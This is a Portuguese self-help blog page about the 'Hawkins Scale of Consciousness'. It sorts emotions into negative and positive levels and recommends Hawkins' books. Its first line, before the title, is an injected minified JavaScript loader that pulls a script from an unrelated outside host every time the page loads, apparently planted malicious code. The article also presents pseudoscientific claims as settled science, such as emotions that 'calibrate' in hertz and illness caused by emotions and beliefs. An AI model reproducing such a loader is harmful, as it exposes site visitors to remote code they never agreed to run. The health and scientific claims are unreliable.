;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Escala Hawkins: conheça as emoções que regem sua consciência.
Categorias
Níveis de Consciência

Escala Hawkins da Consciência: o que é e como utilizá-la

Escala de níveis de consciência? Existe isso?

Sim, existe, e demandou um longo estudo para ser organizado. A Escala Hawkins organiza toda essa pesquisa de forma que todos possam compreender como se dá a evolução humana no que diz respeito às emoções e aos impactos que elas têm em nossa vida.

Com toda certeza, dentro da comunidade científica, Dr. David R. Hawkins foi uma das pessoas que mais se debruçou a estudar, desvendar, organizar e identificar as emoções humanas e como elas se apresentavam numa escala evolutiva.

Como PHD, psiquiatra e estudioso, observava que inúmeras escolas de psicoterapia apoiavam suas condutas na tentativa de obter respostas através da simbologia e referências mitológicas.

Dr.Hawkins buscou um outro caminho:  a simplicidade inerente à verdade. Essa foi sua inspiração para a elaboração de um Mapa das Emoções humanas.

Será que conhecemos as emoções que estão dentro de nós? Será que sabemos verdadeiramente qual é nosso nível de consciência e como isso impacta em nossa vida e define nossos comportamentos?

Compreendendo a Escala Hawkins da Consciência

A Escala Hawkins avalia e ordena emoções que vão das mais negativas às mais positivas e caracteriza cada estado de consciência, detalhando os comportamentos que fazem parte dessas consciências.

É incrível como essa Escala é capaz de mapear nosso comportamento e despertar em nós o desejo do autoconhecimento, de superar cada um desses níveis, nos propondo quase que um desafio de autossuperação.

Compreender os detalhes dessa Escala pode nos trazer saltos de consciência porque nos coloca em contato com a verdadeira essência, tornando transparente as emoções que nos movem e como elas têm impactado em nosso evoluir.

De forma rápida e resumida, o Mapa da Consciência nomeia as seguintes emoções:

Características das Pessoas que vivem em Níveis de Consciência Negativos

Independentemente do quão feliz pareça estar uma pessoa, as emoções negativas estão presentes.

  • Culpa
  • Medo
  • Raiva
  • Ansiedade
  • Irritação
  • Indignação

Todas essas emoções e sentimentos determinam níveis de consciência negativos e trazem sofrimento.

É comum observarmos indivíduos negativos cujos pensamentos são igualmente negativos. Isso acontece porque não se observam, não conseguem se compreender e não conhecem a si próprios. Buscam a felicidade em algum lugar fora delas. E, debruçar essa expectativa de que a felicidade vem do exterior traz muito sofrimento e frustrações constantes.

Essas pessoas se caracterizam por alguns comportamentos como:

  • Não praticam a autorresponsabilidade, não assumem para si o encargo de suas próprias vidas
  • Tendem a culpar tudo e todos por qualquer coisa que saia “errada” em sua vida.
  • Consideram que tudo o que sai fora daquilo que desejavam é uma grande desgraça
  • Nem de longe entendem que a vida é feita de experiências e que estamos aqui para experimentar, aprender e evoluir.
  • Buscam conquistar bens materiais, ter status, ser reconhecidos, captar atenção, tudo fora de si com a intenção de suprir suas carências e ausência de felicidade, tornando-se egoístas.

Características das Pessoas que vivem em Níveis de Consciência Positivos

De outra forma, observamos pessoas que se conectam muito mais com emoções positivas como:

  • Coragem
  • Neutralidade
  • Disposição
  • Aceitação
  • Disposição
  • Razão

São pessoas que entendem a amplitude do conceito de abundância, que é muito mais do que apenas possuir coisas materiais e conhecem o “sucesso”. Geralmente tornamos essas pessoas referências para nosso próprio desenvolvimento.

O entusiasmo, o perdão, o autodomínio estão presentes nas pessoas que focam mais nas emoções positivas. Denotam bem-estar e almejam isso para o próximo também.

Praticam e desenvolvem o autoconhecimento e consideram os erros que cometem uma oportunidade de aprendizado e seguem com tenacidade e constância.

E como é possível reconhecer onde estamos na Escala Hawkins da Consciência?

É apenas através da compreensão sobre em que nível de consciência estamos, como lidamos com nossas emoções e quais são nossas reações que podemos subir na Escala Hawkins da Consciência. Desenvolvendo a auto-observação, olhando verdadeiramente, sem julgamentos para si e para nossos comportamentos.

Quando conseguimos nos apartar das emoções, tanto das negativas quanto das positivas, na maior parte do tempo, olhando para a realidade que existe atrás de todas as situações que nos ocorrem, não julgamos aquilo que acontece como bom ou ruim, apenas observamos e olhamos o aprendizado oculto que existe ali.

Para que isso aconteça não é necessário que nos tornemos alheios e frios diante da realidade, mas é importante que observemos as emoções que nos cabem ou não, aquelas que fazem sentido e aquelas que não queremos mais em nossas vidas. Gênios e pessoas de ideais nobres estão nesse nível de consciência da Razão.

Além desse nível, há ainda pessoas que vivenciam o Amor através de uma postura altruísta e se mobilizam mais pelas necessidades dos outros do que suas próprias necessidades. Fazem isso com alegria, amorosidade por vivenciarem verdadeiramente o Amor. São aqueles que vislumbram uma sociedade mais harmônica e colaborativa.

Aqui no site você pode conhecer mais sobre as emoções da escala de níveis de consciência. Sugerimos que você comece pela emoção Vergonha, que calibra em 20 Hz, a emoção inicial do mapa.

Conheça as emoções presentes em sua jornada

Por isso, buscar o autoconhecimento, a compreensão de como nossas consciências funcionam é a única forma de nos tornarmos pessoas mais plenas e felizes.

Que tal dar início a esse processo através de leituras qualificadas como os livros do Dr. David Hawkins ou com a ajuda de outras pessoas e profissionais que já deram início a esse processo?

Aí você pergunta, por quais livros devo começar? Sem problemas, aqui está uma sugestão de leitura para que você entenda com profundidade a Escala Hawkins de Consciência e como ela pode se tornar uma prática em sua evolução.

  • Poder vs Força: todo o processo de desenvolvimento e os caminhos que Hawkins traçou até chegar à Escala
  • Deixar Ir: cada uma das emoções explanadas detalhadamente, com muitos exemplos que nos ajudam a localizar nossas próprias emoções
  • O Sucesso é para Você: uma visão muito clara e diversa de tudo o que acreditamos ser necessário para se obter sucesso em todas as áreas da vida
  • Cura e Recuperação: a mais nova obra traduzida com exclusividade aqui no Brasil pela Pandora Editora. Nesse livro Dr. Hawkins traz a relação das doenças que desenvolvemos com nossas emoções e crenças e como podemos atuar ativamente no surgimento ou controle delas.

Boa leitura! Boa jornada!

10 respostas em “Escala Hawkins da Consciência: o que é e como utilizá-la”

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *